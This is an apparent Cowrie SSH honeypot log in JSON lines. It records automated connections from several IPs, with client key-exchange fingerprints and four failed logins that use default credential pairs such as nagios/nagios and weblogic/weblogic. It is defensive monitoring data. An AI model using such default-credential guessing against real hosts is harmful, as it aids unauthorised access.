{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":57770,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc94a7183663","protocol":"ssh","message":"New connection: 170.64.157.139:57770 (1.2.3.4:22) [session: dc94a7183663]","sensor":"my-vps","timestamp":"2025-09-08T18:07:09.276875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:07:09.277894Z","src_ip":"170.64.157.139","session":"dc94a7183663"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:07:09.605726Z","src_ip":"170.64.157.139","session":"dc94a7183663"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-09-08T18:07:10.590718Z","src_ip":"170.64.157.139","session":"dc94a7183663"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:07:11.922153Z","src_ip":"170.64.157.139","session":"dc94a7183663"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":59364,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c566e360193","protocol":"ssh","message":"New connection: 170.64.157.139:59364 (1.2.3.4:22) [session: 9c566e360193]","sensor":"my-vps","timestamp":"2025-09-08T18:08:20.241694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:08:20.242387Z","src_ip":"170.64.157.139","session":"9c566e360193"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:08:20.574617Z","src_ip":"170.64.157.139","session":"9c566e360193"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"nagios","message":"login attempt [nagios/nagios] failed","sensor":"my-vps","timestamp":"2025-09-08T18:08:21.952165Z","src_ip":"170.64.157.139","session":"9c566e360193"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:08:23.319300Z","src_ip":"170.64.157.139","session":"9c566e360193"}
{"eventid":"cowrie.session.connect","src_ip":"64.62.197.41","src_port":12387,"dst_ip":"1.2.3.4","dst_port":22,"session":"327ed6cbfdb9","protocol":"ssh","message":"New connection: 64.62.197.41:12387 (1.2.3.4:22) [session: 327ed6cbfdb9]","sensor":"my-vps","timestamp":"2025-09-08T18:09:28.779072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:09:28.780028Z","src_ip":"64.62.197.41","session":"327ed6cbfdb9"}
{"eventid":"cowrie.client.kex","hassh":"7216c7c473918b4f83d1139b3c70dbf9","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc","arcfour"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 7216c7c473918b4f83d1139b3c70dbf9","sensor":"my-vps","timestamp":"2025-09-08T18:09:28.925359Z","src_ip":"64.62.197.41","session":"327ed6cbfdb9"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:09:32.779166Z","src_ip":"64.62.197.41","session":"327ed6cbfdb9"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":58276,"dst_ip":"1.2.3.4","dst_port":22,"session":"e57337a3f0bc","protocol":"ssh","message":"New connection: 170.64.157.139:58276 (1.2.3.4:22) [session: e57337a3f0bc]","sensor":"my-vps","timestamp":"2025-09-08T18:09:33.811541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:09:33.813040Z","src_ip":"170.64.157.139","session":"e57337a3f0bc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:09:34.065747Z","src_ip":"170.64.157.139","session":"e57337a3f0bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26856,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd666f40ce65","protocol":"ssh","message":"New connection: 212.227.125.160:26856 (1.2.3.4:22) [session: bd666f40ce65]","sensor":"my-vps","timestamp":"2025-09-08T18:09:34.329218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:09:34.754086Z","src_ip":"212.227.125.160","session":"bd666f40ce65"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T18:09:34.755296Z","src_ip":"212.227.125.160","session":"bd666f40ce65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"d53e4a0f40ef","protocol":"ssh","message":"New connection: 212.227.125.160:64001 (1.2.3.4:22) [session: d53e4a0f40ef]","sensor":"my-vps","timestamp":"2025-09-08T18:09:34.813345Z"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-09-08T18:09:34.862532Z","src_ip":"170.64.157.139","session":"e57337a3f0bc"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:09:34.865123Z","src_ip":"212.227.125.160","session":"d53e4a0f40ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38362,"dst_ip":"1.2.3.4","dst_port":22,"session":"c66b2b52373d","protocol":"ssh","message":"New connection: 212.227.235.229:38362 (1.2.3.4:22) [session: c66b2b52373d]","sensor":"my-vps","timestamp":"2025-09-08T18:09:35.324694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:09:35.640851Z","src_ip":"212.227.235.229","session":"c66b2b52373d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T18:09:35.641573Z","src_ip":"212.227.235.229","session":"c66b2b52373d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:09:36.007023Z","src_ip":"212.227.125.160","session":"bd666f40ce65"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:09:36.116958Z","src_ip":"170.64.157.139","session":"e57337a3f0bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26868,"dst_ip":"1.2.3.4","dst_port":22,"session":"446f185f2e6e","protocol":"ssh","message":"New connection: 212.227.125.160:26868 (1.2.3.4:22) [session: 446f185f2e6e]","sensor":"my-vps","timestamp":"2025-09-08T18:09:36.177927Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:09:37.123238Z","src_ip":"212.227.125.160","session":"446f185f2e6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26878,"dst_ip":"1.2.3.4","dst_port":22,"session":"f451140b9f68","protocol":"ssh","message":"New connection: 212.227.125.160:26878 (1.2.3.4:22) [session: f451140b9f68]","sensor":"my-vps","timestamp":"2025-09-08T18:09:37.283335Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:09:37.843630Z","src_ip":"212.227.235.229","session":"c66b2b52373d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38366,"dst_ip":"1.2.3.4","dst_port":22,"session":"673bf971f84d","protocol":"ssh","message":"New connection: 212.227.235.229:38366 (1.2.3.4:22) [session: 673bf971f84d]","sensor":"my-vps","timestamp":"2025-09-08T18:09:38.083902Z"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:09:38.270744Z","src_ip":"212.227.125.160","session":"f451140b9f68"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:09:38.908112Z","src_ip":"212.227.235.229","session":"673bf971f84d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38374,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a8669525d5b","protocol":"ssh","message":"New connection: 212.227.235.229:38374 (1.2.3.4:22) [session: 5a8669525d5b]","sensor":"my-vps","timestamp":"2025-09-08T18:09:39.120157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:09:39.799813Z","src_ip":"212.227.235.229","session":"5a8669525d5b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T18:09:39.800459Z","src_ip":"212.227.235.229","session":"5a8669525d5b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:09:41.909620Z","src_ip":"212.227.235.229","session":"5a8669525d5b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50408,"dst_ip":"1.2.3.4","dst_port":22,"session":"7697386003ba","protocol":"ssh","message":"New connection: 217.72.205.35:50408 (1.2.3.4:22) [session: 7697386003ba]","sensor":"my-vps","timestamp":"2025-09-08T18:09:55.566727Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:09:55.567787Z","src_ip":"217.72.205.35","session":"7697386003ba"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":45728,"dst_ip":"1.2.3.4","dst_port":22,"session":"365e83e3f350","protocol":"ssh","message":"New connection: 170.64.157.139:45728 (1.2.3.4:22) [session: 365e83e3f350]","sensor":"my-vps","timestamp":"2025-09-08T18:10:50.582899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:10:50.609931Z","src_ip":"170.64.157.139","session":"365e83e3f350"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:10:50.970595Z","src_ip":"170.64.157.139","session":"365e83e3f350"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-09-08T18:10:52.517342Z","src_ip":"170.64.157.139","session":"365e83e3f350"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:10:53.868732Z","src_ip":"170.64.157.139","session":"365e83e3f350"}
{"eventid":"cowrie.session.connect","src_ip":"172.104.11.46","src_port":32816,"dst_ip":"1.2.3.4","dst_port":22,"session":"34b13896e95e","protocol":"ssh","message":"New connection: 172.104.11.46:32816 (1.2.3.4:22) [session: 34b13896e95e]","sensor":"my-vps","timestamp":"2025-09-08T18:11:06.699883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:11:07.091956Z","src_ip":"172.104.11.46","session":"34b13896e95e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T18:11:07.092612Z","src_ip":"172.104.11.46","session":"34b13896e95e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:11:08.041645Z","src_ip":"172.104.11.46","session":"34b13896e95e"}
{"eventid":"cowrie.session.connect","src_ip":"172.104.11.46","src_port":32830,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba7458aa33f6","protocol":"ssh","message":"New connection: 172.104.11.46:32830 (1.2.3.4:22) [session: ba7458aa33f6]","sensor":"my-vps","timestamp":"2025-09-08T18:11:08.174929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:11:08.550267Z","src_ip":"172.104.11.46","session":"ba7458aa33f6"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T18:11:08.550947Z","src_ip":"172.104.11.46","session":"ba7458aa33f6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:11:09.486994Z","src_ip":"172.104.11.46","session":"ba7458aa33f6"}
{"eventid":"cowrie.session.connect","src_ip":"172.104.11.46","src_port":32846,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa19a8cd0477","protocol":"ssh","message":"New connection: 172.104.11.46:32846 (1.2.3.4:22) [session: aa19a8cd0477]","sensor":"my-vps","timestamp":"2025-09-08T18:11:09.612628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:11:09.997956Z","src_ip":"172.104.11.46","session":"aa19a8cd0477"}
